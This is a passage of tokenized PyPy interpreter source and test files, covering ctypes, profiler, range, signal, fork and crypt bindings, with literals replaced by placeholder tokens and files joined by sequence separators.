_objects == { '<STR_LIT:0>' : "<STR_LIT>" , id ( array ) : array } <EOL> assert array . _objects is p . _objects <EOL> p [ <NUM_LIT:1> ] = "<STR_LIT>" <EOL> assert p . _objects == { '<STR_LIT:1>' : '<STR_LIT>' , '<STR_LIT:0>' : "<STR_LIT>" , id ( array ) : array } <EOL> assert array . _objects is p . _objects <EOL> def test_other ( self ) : <EOL> p = cast ( ( c_int * <NUM_LIT:4> ) ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) , POINTER ( c_int ) ) <EOL> assert p [ : <NUM_LIT:4> ] == [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] <EOL> c_int ( ) <EOL> assert p [ : <NUM_LIT:4> ] == [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] <EOL> p [ <NUM_LIT:2> ] = <NUM_LIT> <EOL> assert p [ : <NUM_LIT:4> ] == [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT:4> ] <EOL> c_int ( ) <EOL> assert p [ : <NUM_LIT:4> ] == [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT:4> ] <EOL> def test_char_p ( self ) : <EOL> s = c_char_p ( "<STR_LIT>" ) <EOL> assert cast ( cast ( s , c_void_p ) , c_char_p ) . value == ( <EOL> "<STR_LIT>" ) <EOL> try : <EOL> c_wchar_p <EOL> except NameError : <EOL> pass <EOL> else : <EOL> def test_wchar_p ( self ) : <EOL> s = c_wchar_p ( "<STR_LIT>" ) <EOL> assert cast ( cast ( s , c_void_p ) , c_wchar_p ) . value == ( <EOL> "<STR_LIT>" ) <EOL> def test_cast_functype ( self ) : <EOL> my_sqrt = lib . my_sqrt <EOL> sqrt = cast ( cast ( my_sqrt , c_void_p ) , CFUNCTYPE ( c_double , c_double ) ) <EOL> assert sqrt ( <NUM_LIT> ) == <NUM_LIT> </s>
<s> """<STR_LIT>""" <EOL> import ctypes <EOL> from ctypes_support import standard_c_lib as _c <EOL> open_osfhandle = _c . _open_osfhandle <EOL> open_osfhandle . argtypes = [ ctypes . c_int , ctypes . c_int ] <EOL> open_osfhandle . restype = ctypes . c_int <EOL> get_osfhandle = _c . _get_osfhandle <EOL> get_osfhandle . argtypes = [ ctypes . c_int ] <EOL> get_osfhandle . restype = ctypes . c_int <EOL> setmode = _c . _setmode <EOL> setmode . argtypes = [ ctypes . c_int , ctypes . c_int ] <EOL> setmode . restype = ctypes . c_int <EOL> del ctypes </s>
<s> from pyrepl . console import Event <EOL> from pyrepl . tests . infrastructure import ReaderTestCase , EA , run_testcase <EOL> class WishesTestCase ( ReaderTestCase ) : <EOL> def test_quoted_insert_repeat ( self ) : <EOL> self . run_test ( [ ( ( '<STR_LIT>' , '<STR_LIT:3>' ) , [ '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' ] ) , <EOL> ( ( '<STR_LIT>' , '<STR_LIT>' ) , [ '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , None ) ] ) <EOL> def test ( ) : <EOL> run_testcase ( WishesTestCase ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> test ( ) </s>
<s> """<STR_LIT>""" <EOL> from __pypy__ import tproxy <EOL> from types import MethodType <EOL> _dummy = object ( ) <EOL> origtype = type <EOL> def make_proxy ( controller , type = _dummy , obj = _dummy ) : <EOL> """<STR_LIT>""" <EOL> if type is _dummy : <EOL> if obj is _dummy : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> type = origtype ( obj ) <EOL> def perform ( opname , * args , ** kwargs ) : <EOL> operation = ProxyOperation ( tp , obj , opname , args , kwargs ) <EOL> return controller ( operation ) <EOL> tp = tproxy ( type , perform ) <EOL> return tp <EOL> class ProxyOperation ( object ) : <EOL> def __init__ ( self , proxyobj , obj , opname , args , kwargs ) : <EOL> self . proxyobj = proxyobj <EOL> self . opname = opname <EOL> self . args = args <EOL> self . kwargs = kwargs <EOL> if obj is not _dummy : <EOL> self . obj = obj <EOL> def delegate ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> obj = getattr ( self , '<STR_LIT>' ) <EOL> except AttributeError : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> objattr = getattr ( obj , self . opname ) <EOL> res = objattr ( * self . args , ** self . kwargs ) <EOL> if self . opname == "<STR_LIT>" : <EOL> if ( isinstance ( res , MethodType ) and <EOL> res . im_self is self . instance ) : <EOL> res = MethodType ( res . im_func , self . proxyobj , res . im_class ) <EOL> if res is self . obj : <EOL> res = self . proxyobj <EOL> return res <EOL> def __repr__ ( self ) : <EOL> args = "<STR_LIT:U+002CU+0020>" . join ( [ repr ( x ) for x in self . args ] ) <EOL> args = "<STR_LIT>" % id ( self . proxyobj ) + args <EOL> if self . kwargs : <EOL> args += "<STR_LIT:U+002CU+0020>" . join ( [ "<STR_LIT>" % item <EOL> for item in self . kwargs . items ( ) ] ) <EOL> return "<STR_LIT>" % ( <EOL> type ( self . proxyobj ) . __name__ , self . opname , args ) </s>
<s> import autopath <EOL> class AppTestRange : <EOL> def test_range_toofew ( self ) : <EOL> raises ( TypeError , range ) <EOL> def test_range_toomany ( self ) : <EOL> raises ( TypeError , range , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) <EOL> def test_range_one ( self ) : <EOL> assert range ( <NUM_LIT:1> ) == [ <NUM_LIT:0> ] <EOL> def test_range_posstartisstop ( self ) : <EOL> assert range ( <NUM_LIT:1> , <NUM_LIT:1> ) == [ ] <EOL> def test_range_negstartisstop ( self ) : <EOL> assert range ( - <NUM_LIT:1> , - <NUM_LIT:1> ) == [ ] <EOL> def test_range_zero ( self ) : <EOL> assert range ( <NUM_LIT:0> ) == [ ] <EOL> def test_range_twoargs ( self ) : <EOL> assert range ( <NUM_LIT:1> , <NUM_LIT:2> ) == [ <NUM_LIT:1> ] <EOL> def test_range_decreasingtwoargs ( self ) : <EOL> assert range ( <NUM_LIT:3> , <NUM_LIT:1> ) == [ ] <EOL> def test_range_negatives ( self ) : <EOL> assert range ( - <NUM_LIT:3> ) == [ ] <EOL> def test_range_decreasing_negativestep ( self ) : <EOL> assert range ( <NUM_LIT:5> , - <NUM_LIT:2> , - <NUM_LIT:1> ) == [ <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] <EOL> def test_range_posfencepost1 ( self ) : <EOL> assert range ( <NUM_LIT:1> , <NUM_LIT:10> , <NUM_LIT:3> ) == [ <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:7> ] <EOL> def test_range_posfencepost2 ( self ) : <EOL> assert range ( <NUM_LIT:1> , <NUM_LIT:11> , <NUM_LIT:3> ) == [ <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:10> ] <EOL> def test_range_posfencepost3 ( self ) : <EOL> assert range ( <NUM_LIT:1> , <NUM_LIT:12> , <NUM_LIT:3> ) == [ <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:10> ] <EOL> def test_range_negfencepost1 ( self ) : <EOL> assert range ( - <NUM_LIT:1> , - <NUM_LIT:10> , - <NUM_LIT:3> ) == [ - <NUM_LIT:1> , - <NUM_LIT:4> , - <NUM_LIT:7> ] <EOL> def test_range_negfencepost2 ( self ) : <EOL> assert range ( - <NUM_LIT:1> , - <NUM_LIT:11> , - <NUM_LIT:3> ) == [ - <NUM_LIT:1> , - <NUM_LIT:4> , - <NUM_LIT:7> , - 
<NUM_LIT:10> ] <EOL> def test_range_negfencepost3 ( self ) : <EOL> assert range ( - <NUM_LIT:1> , - <NUM_LIT:12> , - <NUM_LIT:3> ) == [ - <NUM_LIT:1> , - <NUM_LIT:4> , - <NUM_LIT:7> , - <NUM_LIT:10> ] <EOL> def test_range_decreasing_negativelargestep ( self ) : <EOL> assert range ( <NUM_LIT:5> , - <NUM_LIT:2> , - <NUM_LIT:3> ) == [ <NUM_LIT:5> , <NUM_LIT:2> , - <NUM_LIT:1> ] <EOL> def test_range_increasing_positivelargestep ( self ) : <EOL> assert range ( - <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:3> ) == [ - <NUM_LIT:5> , - <NUM_LIT:2> , <NUM_LIT:1> ] <EOL> def test_range_zerostep ( self ) : <EOL> raises ( ValueError , range , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:0> ) <EOL> def test_range_float ( self ) : <EOL> "<STR_LIT>" <EOL> assert range ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) == [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> def test_range_wrong_type ( self ) : <EOL> raises ( TypeError , range , "<STR_LIT>" ) <EOL> def test_range_object_with___int__ ( self ) : <EOL> class A ( object ) : <EOL> def __int__ ( self ) : <EOL> return <NUM_LIT:5> <EOL> assert range ( A ( ) ) == [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] <EOL> assert range ( <NUM_LIT:0> , A ( ) ) == [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] <EOL> assert range ( <NUM_LIT:0> , <NUM_LIT:10> , A ( ) ) == [ <NUM_LIT:0> , <NUM_LIT:5> ] <EOL> def test_range_long ( self ) : <EOL> import sys <EOL> assert range ( - <NUM_LIT:2> ** <NUM_LIT:100> ) == [ ] <EOL> assert range ( <NUM_LIT:0> , - <NUM_LIT:2> ** <NUM_LIT:100> ) == [ ] <EOL> assert range ( <NUM_LIT:0> , <NUM_LIT:2> ** <NUM_LIT:100> , - <NUM_LIT:1> ) == [ ] <EOL> assert range ( <NUM_LIT:0> , <NUM_LIT:2> ** <NUM_LIT:100> , - <NUM_LIT:1> ) == [ ] <EOL> a = long ( <NUM_LIT:10> * sys . maxint ) <EOL> b = long ( <NUM_LIT:100> * sys . maxint ) <EOL> c = long ( <NUM_LIT:50> * sys . 
maxint ) <EOL> assert range ( a , a + <NUM_LIT:2> ) == [ a , a + <NUM_LIT:1> ] <EOL> assert range ( a + <NUM_LIT:2> , a , - <NUM_LIT:1> L ) == [ a + <NUM_LIT:2> , a + <NUM_LIT:1> ] <EOL> assert range ( a + <NUM_LIT:4> , a , - <NUM_LIT:2> ) == [ a + <NUM_LIT:4> , a + <NUM_LIT:2> ] </s>
<s> from pypy . interpreter . baseobjspace import ( W_Root , ObjSpace , Wrappable , <EOL> Arguments ) <EOL> from pypy . interpreter . typedef import ( TypeDef , GetSetProperty , <EOL> interp_attrproperty ) <EOL> from pypy . interpreter . gateway import interp2app , NoneNotWrapped <EOL> from pypy . interpreter . function import Method , Function <EOL> import time , sys <EOL> class W_StatsEntry ( Wrappable ) : <EOL> def __init__ ( self , space , frame , callcount , reccallcount , tt , it , <EOL> w_sublist ) : <EOL> self . frame = frame <EOL> self . callcount = callcount <EOL> self . reccallcount = reccallcount <EOL> self . it = it <EOL> self . tt = tt <EOL> self . w_calls = w_sublist <EOL> def get_calls ( space , self ) : <EOL> return self . w_calls <EOL> def repr ( self , space ) : <EOL> frame_repr = space . str_w ( space . repr ( self . frame ) ) <EOL> if not self . w_calls : <EOL> calls_repr = "<STR_LIT:None>" <EOL> else : <EOL> calls_repr = space . str_w ( space . repr ( self . w_calls ) ) <EOL> return space . wrap ( '<STR_LIT>' % ( <EOL> frame_repr , self . callcount , self . reccallcount , <EOL> self . tt , self . it , calls_repr ) ) <EOL> repr . unwrap_spec = [ '<STR_LIT>' , ObjSpace ] <EOL> def get_code ( space , self ) : <EOL> return self . frame <EOL> W_StatsEntry . typedef = TypeDef ( <EOL> '<STR_LIT>' , <EOL> code = GetSetProperty ( W_StatsEntry . get_code ) , <EOL> callcount = interp_attrproperty ( '<STR_LIT>' , W_StatsEntry ) , <EOL> reccallcount = interp_attrproperty ( '<STR_LIT>' , W_StatsEntry ) , <EOL> inlinetime = interp_attrproperty ( '<STR_LIT>' , W_StatsEntry ) , <EOL> totaltime = interp_attrproperty ( '<STR_LIT>' , W_StatsEntry ) , <EOL> calls = GetSetProperty ( W_StatsEntry . get_calls ) , <EOL> __repr__ = interp2app ( W_StatsEntry . repr ) , <EOL> ) <EOL> class W_StatsSubEntry ( Wrappable ) : <EOL> def __init__ ( self , space , frame , callcount , reccallcount , tt , it ) : <EOL> self . frame = frame <EOL> self . 
callcount = callcount <EOL> self . reccallcount = reccallcount <EOL> self . it = it <EOL> self . tt = tt <EOL> def repr ( self , space ) : <EOL> frame_repr = space . str_w ( space . repr ( self . frame ) ) <EOL> return space . wrap ( '<STR_LIT>' % ( <EOL> frame_repr , self . callcount , self . reccallcount , self . tt , self . it ) ) <EOL> repr . unwrap_spec = [ '<STR_LIT>' , ObjSpace ] <EOL> def get_code ( space , self ) : <EOL> return self . frame <EOL> W_StatsSubEntry . typedef = TypeDef ( <EOL> '<STR_LIT>' , <EOL> code = GetSetProperty ( W_StatsSubEntry . get_code ) , <EOL> callcount = interp_attrproperty ( '<STR_LIT>' , W_StatsSubEntry ) , <EOL> reccallcount = interp_attrproperty ( '<STR_LIT>' , W_StatsSubEntry ) , <EOL> inlinetime = interp_attrproperty ( '<STR_LIT>' , W_StatsSubEntry ) , <EOL> totaltime = interp_attrproperty ( '<STR_LIT>' , W_StatsSubEntry ) , <EOL> __repr__ = interp2app ( W_StatsSubEntry . repr ) , <EOL> ) <EOL> def stats ( space , values , factor ) : <EOL> l_w = [ ] <EOL> for v in values : <EOL> if v . callcount != <NUM_LIT:0> : <EOL> l_w . append ( v . stats ( space , factor ) ) <EOL> return space . newlist ( l_w ) <EOL> class ProfilerEntry ( object ) : <EOL> def __init__ ( self , frame ) : <EOL> self . frame = frame <EOL> self . tt = <NUM_LIT:0> <EOL> self . it = <NUM_LIT:0> <EOL> self . callcount = <NUM_LIT:0> <EOL> self . recursivecallcount = <NUM_LIT:0> <EOL> self . recursionLevel = <NUM_LIT:0> <EOL> self . calls = { } <EOL> def stats ( self , space , factor ) : <EOL> if self . calls : <EOL> w_sublist = space . newlist ( [ sub_entry . stats ( space , self , factor ) <EOL> for sub_entry in self . calls . values ( ) ] ) <EOL> else : <EOL> w_sublist = space . w_None <EOL> w_se = W_StatsEntry ( space , self . frame , self . callcount , <EOL> self . recursivecallcount , <EOL> factor * self . tt , factor * self . it , w_sublist ) <EOL> return space . 
wrap ( w_se ) <EOL> class ProfilerSubEntry ( object ) : <EOL> def __init__ ( self , frame ) : <EOL> self . frame = frame <EOL> self . tt = <NUM_LIT:0> <EOL> self . it = <NUM_LIT:0> <EOL> self . callcount = <NUM_LIT:0> <EOL> self . recursivecallcount = <NUM_LIT:0> <EOL> self . recursionLevel = <NUM_LIT:0> <EOL> def stats ( self , space , parent , factor ) : <EOL> w_sse = W_StatsSubEntry ( space , self . frame , <EOL> self . callcount , self . recursivecallcount , <EOL> factor * self . tt , factor * self . it ) <EOL> return space . wrap ( w_sse ) <EOL> class ProfilerContext ( object ) : <EOL> def __init__ ( self , profobj , entry ) : <EOL> self . entry = entry <EOL> self . subt = <NUM_LIT:0> <EOL> self . previous = profobj . current_context <EOL> entry . recursionLevel += <NUM_LIT:1> <EOL> if profobj . subcalls and self . previous : <EOL> caller = self . previous . entry <EOL> try : <EOL> subentry = caller . calls [ entry ] <EOL> except KeyError : <EOL> subentry = ProfilerSubEntry ( entry . frame ) <EOL> caller . calls [ entry ] = subentry <EOL> subentry . recursionLevel += <NUM_LIT:1> <EOL> self . t0 = profobj . timer ( ) <EOL> def _stop ( self , profobj , entry ) : <EOL> tt = profobj . timer ( ) - self . t0 <EOL> it = tt - self . subt <EOL> if self . previous : <EOL> self . previous . subt += tt <EOL> entry . recursionLevel -= <NUM_LIT:1> <EOL> if entry . recursionLevel == <NUM_LIT:0> : <EOL> entry . tt += tt <EOL> else : <EOL> entry . recursivecallcount += <NUM_LIT:1> <EOL> entry . it += it <EOL> entry . callcount += <NUM_LIT:1> <EOL> if profobj . subcalls and self . previous : <EOL> caller = self . previous . entry <EOL> try : <EOL> subentry = caller . calls [ entry ] <EOL> except KeyError : <EOL> pass <EOL> else : <EOL> subentry . recursionLevel -= <NUM_LIT:1> <EOL> if subentry . recursionLevel == <NUM_LIT:0> : <EOL> subentry . tt += tt <EOL> else : <EOL> subentry . recursivecallcount += <NUM_LIT:1> <EOL> subentry . it += it <EOL> subentry . 
callcount += <NUM_LIT:1> <EOL> def create_spec ( space , w_arg ) : <EOL> if isinstance ( w_arg , Method ) : <EOL> w_function = w_arg . w_function <EOL> class_name = w_arg . w_class . getname ( space , '<STR_LIT:?>' ) <EOL> assert isinstance ( w_function , Function ) <EOL> return "<STR_LIT>" % ( w_function . name , class_name ) <EOL> elif isinstance ( w_arg , Function ) : <EOL> if w_arg . w_module is None : <EOL> module = '<STR_LIT>' <EOL> else : <EOL> module = space . str_w ( w_arg . w_module ) <EOL> if module == '<STR_LIT>' : <EOL> module = '<STR_LIT>' <EOL> else : <EOL> module += '<STR_LIT:.>' <EOL> return '<STR_LIT>' % ( module , w_arg . name ) <EOL> else : <EOL> return '<STR_LIT>' <EOL> def lsprof_call ( space , w_self , frame , event , w_arg ) : <EOL> assert isinstance ( w_self , W_Profiler ) <EOL> if event == '<STR_LIT>' : <EOL> code = frame . getcode ( ) <EOL> w_self . _enter_call ( code ) <EOL> elif event == '<STR_LIT>' : <EOL> code = frame . getcode ( ) <EOL> w_self . _enter_return ( code ) <EOL> elif event == '<STR_LIT>' : <EOL> if w_self . builtins : <EOL> key = create_spec ( space , w_arg ) <EOL> w_self . _enter_builtin_call ( key ) <EOL> elif event == '<STR_LIT>' : <EOL> if w_self . builtins : <EOL> key = create_spec ( space , w_arg ) <EOL> w_self . _enter_builtin_return ( key ) <EOL> else : <EOL> pass <EOL> class W_Profiler ( Wrappable ) : <EOL> def __init__ ( self , space , w_callable , time_unit , subcalls , builtins ) : <EOL> self . subcalls = subcalls <EOL> self . builtins = builtins <EOL> self . current_context = None <EOL> self . w_callable = w_callable <EOL> self . time_unit = time_unit <EOL> self . data = { } <EOL> self . builtin_data = { } <EOL> self . space = space <EOL> def timer ( self ) : <EOL> if self . w_callable : <EOL> space = self . space <EOL> return space . float_w ( space . call_function ( self . w_callable ) ) <EOL> return time . 
time ( ) <EOL> def enable ( self , space , w_subcalls = NoneNotWrapped , <EOL> w_builtins = NoneNotWrapped ) : <EOL> if w_subcalls is not None : <EOL> self . subcalls = space . bool_w ( w_subcalls ) <EOL> if w_builtins is not None : <EOL> self . builtins = space . bool_w ( w_builtins ) <EOL> space . getexecutioncontext ( ) . setllprofile ( lsprof_call , space . wrap ( self ) ) <EOL> enable . unwrap_spec = [ '<STR_LIT>' , ObjSpace , W_Root , W_Root ] <EOL> def _enter_call ( self , f_code ) : <EOL> try : <EOL> entry = self . data [ f_code ] <EOL> except KeyError : <EOL> entry = ProfilerEntry ( f_code ) <EOL> self . data [ f_code ] = entry <EOL> self . current_context = ProfilerContext ( self , entry ) <EOL> def _enter_return ( self , f_code ) : <EOL> context = self . current_context <EOL> if context is None : <EOL> return <EOL> try : <EOL> entry = self . data [ f_code ] <EOL> context . _stop ( self , entry ) <EOL> except KeyError : <EOL> pass <EOL> self . current_context = context . previous <EOL> def _enter_builtin_call ( self , key ) : <EOL> try : <EOL> entry = self . builtin_data [ key ] <EOL> except KeyError : <EOL> entry = ProfilerEntry ( self . space . wrap ( key ) ) <EOL> self . builtin_data [ key ] = entry <EOL> self . current_context = ProfilerContext ( self , entry ) <EOL> def _enter_builtin_return ( self , key ) : <EOL> context = self . current_context <EOL> if context is None : <EOL> return <EOL> try : <EOL> entry = self . builtin_data [ key ] <EOL> context . _stop ( self , entry ) <EOL> except KeyError : <EOL> pass <EOL> self . current_context = context . previous <EOL> def _flush_unmatched ( self ) : <EOL> context = self . current_context <EOL> while context : <EOL> entry = context . entry <EOL> if entry : <EOL> context . _stop ( self , entry ) <EOL> context = context . previous <EOL> self . current_context = None <EOL> def disable ( self , space ) : <EOL> space . getexecutioncontext ( ) . setllprofile ( None , None ) <EOL> self . 
_flush_unmatched ( ) <EOL> disable . unwrap_spec = [ '<STR_LIT>' , ObjSpace ] <EOL> def getstats ( self , space ) : <EOL> if self . w_callable is None : <EOL> factor = <NUM_LIT:1.> <EOL> elif self . time_unit > <NUM_LIT:0.0> : <EOL> factor = self . time_unit <EOL> else : <EOL> factor = <NUM_LIT:1.0> / sys . maxint <EOL> return stats ( space , self . data . values ( ) + self . builtin_data . values ( ) , <EOL> factor ) <EOL> getstats . unwrap_spec = [ '<STR_LIT>' , ObjSpace ] <EOL> def descr_new_profile ( space , w_type , w_callable = NoneNotWrapped , time_unit = <NUM_LIT:0.0> , <EOL> subcalls = True , builtins = True ) : <EOL> p = space . allocate_instance ( W_Profiler , w_type ) <EOL> p . __init__ ( space , w_callable , time_unit , subcalls , builtins ) <EOL> return space . wrap ( p ) <EOL> descr_new_profile . unwrap_spec = [ ObjSpace , W_Root , W_Root , float , bool , bool ] <EOL> W_Profiler . typedef = TypeDef ( <EOL> '<STR_LIT>' , <EOL> __new__ = interp2app ( descr_new_profile ) , <EOL> enable = interp2app ( W_Profiler . enable ) , <EOL> disable = interp2app ( W_Profiler . disable ) , <EOL> getstats = interp2app ( W_Profiler . getstats ) , <EOL> ) </s>
<s> from pypy . conftest import gettestobjspace , option <EOL> import py <EOL> class AppTestBasic : <EOL> def setup_class ( cls ) : <EOL> cls . space = gettestobjspace ( usemodules = ( '<STR_LIT>' , ) ) <EOL> def test_pickle_main ( self ) : <EOL> import _stackless , pickle <EOL> main = _stackless . coroutine . getcurrent ( ) <EOL> s = pickle . dumps ( main ) <EOL> c = pickle . loads ( s ) <EOL> assert c is main <EOL> class AppTestPickle : <EOL> def setup_class ( cls ) : <EOL> if not option . runappdirect : <EOL> py . test . skip ( '<STR_LIT>' ) <EOL> cls . space = gettestobjspace ( usemodules = ( '<STR_LIT>' , ) ) <EOL> def test_simple_ish ( self ) : <EOL> import new , sys <EOL> mod = new . module ( '<STR_LIT>' ) <EOL> sys . modules [ '<STR_LIT>' ] = mod <EOL> try : <EOL> exec '''<STR_LIT>''' in mod . __dict__ <EOL> finally : <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> def test_closure ( self ) : <EOL> import new , sys <EOL> mod = new . module ( '<STR_LIT>' ) <EOL> sys . modules [ '<STR_LIT>' ] = mod <EOL> try : <EOL> exec '''<STR_LIT>''' in mod . __dict__ <EOL> finally : <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> def test_exception ( self ) : <EOL> import new , sys <EOL> mod = new . module ( '<STR_LIT>' ) <EOL> sys . modules [ '<STR_LIT>' ] = mod <EOL> try : <EOL> exec '''<STR_LIT>''' in mod . __dict__ <EOL> finally : <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> def test_loop ( self ) : <EOL> import new , sys <EOL> mod = new . module ( '<STR_LIT>' ) <EOL> sys . modules [ '<STR_LIT>' ] = mod <EOL> try : <EOL> exec '''<STR_LIT>''' in mod . __dict__ <EOL> finally : <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> def test_valstack ( self ) : <EOL> import new , sys <EOL> mod = new . module ( '<STR_LIT>' ) <EOL> sys . modules [ '<STR_LIT>' ] = mod <EOL> try : <EOL> exec '''<STR_LIT>''' in mod . __dict__ <EOL> finally : <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> def test_exec_and_locals ( self ) : <EOL> import new , sys <EOL> mod = new . 
module ( '<STR_LIT>' ) <EOL> sys . modules [ '<STR_LIT>' ] = mod <EOL> try : <EOL> exec '''<STR_LIT>''' in mod . __dict__ <EOL> finally : <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> def test_solver ( self ) : <EOL> import new , sys <EOL> mod = new . module ( '<STR_LIT>' ) <EOL> sys . modules [ '<STR_LIT>' ] = mod <EOL> try : <EOL> exec '''<STR_LIT>''' in mod . __dict__ <EOL> finally : <EOL> del sys . modules [ '<STR_LIT>' ] </s>
<s> from pypy . interpreter . error import OperationError <EOL> from pypy . interpreter . baseobjspace import ObjSpace , W_Root <EOL> from pypy . rpython . lltypesystem import rffi , lltype <EOL> from pypy . translator . tool . cbuild import ExternalCompilationInfo <EOL> import sys <EOL> if sys . platform . startswith ( '<STR_LIT>' ) : <EOL> eci = ExternalCompilationInfo ( ) <EOL> else : <EOL> eci = ExternalCompilationInfo ( libraries = [ '<STR_LIT>' ] ) <EOL> c_crypt = rffi . llexternal ( '<STR_LIT>' , [ rffi . CCHARP , rffi . CCHARP ] , rffi . CCHARP , <EOL> compilation_info = eci , threadsafe = False ) <EOL> def crypt ( space , word , salt ) : <EOL> """<STR_LIT>""" <EOL> res = c_crypt ( word , salt ) <EOL> if not res : <EOL> return space . w_None <EOL> str_res = rffi . charp2str ( res ) <EOL> return space . wrap ( str_res ) <EOL> crypt . unwrap_spec = [ ObjSpace , str , str ] </s>
<s> from pypy . interpreter . mixedmodule import MixedModule <EOL> class Module ( MixedModule ) : <EOL> applevel_name = '<STR_LIT>' <EOL> interpleveldefs = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> appleveldefs = { } </s>
<s> def pytest_addoption ( parser ) : <EOL> group = parser . addgroup ( "<STR_LIT>" ) <EOL> group . addoption ( "<STR_LIT>" , action = "<STR_LIT:store>" , default = None , dest = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) </s>
<s> import os , py <EOL> from pypy import conftest ; conftest . translation_test_so_skip_if_appdirect ( ) <EOL> from pypy . translator . c . test . test_genc import compile <EOL> from pypy . module . signal import interp_signal <EOL> def setup_module ( mod ) : <EOL> if not hasattr ( os , '<STR_LIT>' ) or not hasattr ( os , '<STR_LIT>' ) : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> def check ( expected ) : <EOL> res = interp_signal . pypysig_poll ( ) <EOL> os . write ( <NUM_LIT:1> , "<STR_LIT>" % ( res , expected ) ) <EOL> assert res == expected <EOL> def test_simple ( ) : <EOL> import os <EOL> check ( - <NUM_LIT:1> ) <EOL> check ( - <NUM_LIT:1> ) <EOL> for i in range ( <NUM_LIT:3> ) : <EOL> interp_signal . pypysig_setflag ( interp_signal . SIGUSR1 ) <EOL> os . kill ( os . getpid ( ) , interp_signal . SIGUSR1 ) <EOL> check ( interp_signal . SIGUSR1 ) <EOL> check ( - <NUM_LIT:1> ) <EOL> check ( - <NUM_LIT:1> ) <EOL> interp_signal . pypysig_ignore ( interp_signal . SIGUSR1 ) <EOL> os . kill ( os . getpid ( ) , interp_signal . SIGUSR1 ) <EOL> check ( - <NUM_LIT:1> ) <EOL> check ( - <NUM_LIT:1> ) <EOL> interp_signal . pypysig_default ( interp_signal . SIGUSR1 ) <EOL> check ( - <NUM_LIT:1> ) <EOL> def test_compile ( ) : <EOL> fn = compile ( test_simple , [ ] ) <EOL> fn ( ) </s>
<s> import py , sys <EOL> from pypy . conftest import gettestobjspace <EOL> from pypy . module . thread . test . support import GenericTestThread <EOL> class AppTestFork ( GenericTestThread ) : <EOL> def test_fork ( self ) : <EOL> import thread <EOL> import os <EOL> import time <EOL> if not hasattr ( os , '<STR_LIT>' ) : <EOL> skip ( "<STR_LIT>" ) <EOL> run = True <EOL> done = [ ] <EOL> def busy_thread ( ) : <EOL> while run : <EOL> time . sleep ( <NUM_LIT:0> ) <EOL> done . append ( None ) <EOL> try : <EOL> thread . start_new ( busy_thread , ( ) ) <EOL> pid = os . fork ( ) <EOL> if pid == <NUM_LIT:0> : <EOL> os . _exit ( <NUM_LIT:0> ) <EOL> else : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> spid , status = os . waitpid ( pid , os . WNOHANG ) <EOL> assert spid == pid <EOL> finally : <EOL> run = False <EOL> self . waitfor ( lambda : done ) </s>
<s> """<STR_LIT>""" <EOL> class error ( Exception ) : <EOL> """<STR_LIT>""" </s>
<s> from pypy . interpreter . baseobjspace import ObjSpace <EOL> from pypy . interpreter . error import OperationError <EOL> from pypy . objspace . descroperation import DescrOperation <EOL> from pypy . objspace . std . multimethod import FailedToImplement <EOL> from pypy . objspace . std . boolobject import W_BoolObject <EOL> from pypy . tool . sourcetools import func_with_new_name <EOL> METHODS_WITH_SHORTCUT = dict . fromkeys ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:str>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:index>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:int>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> 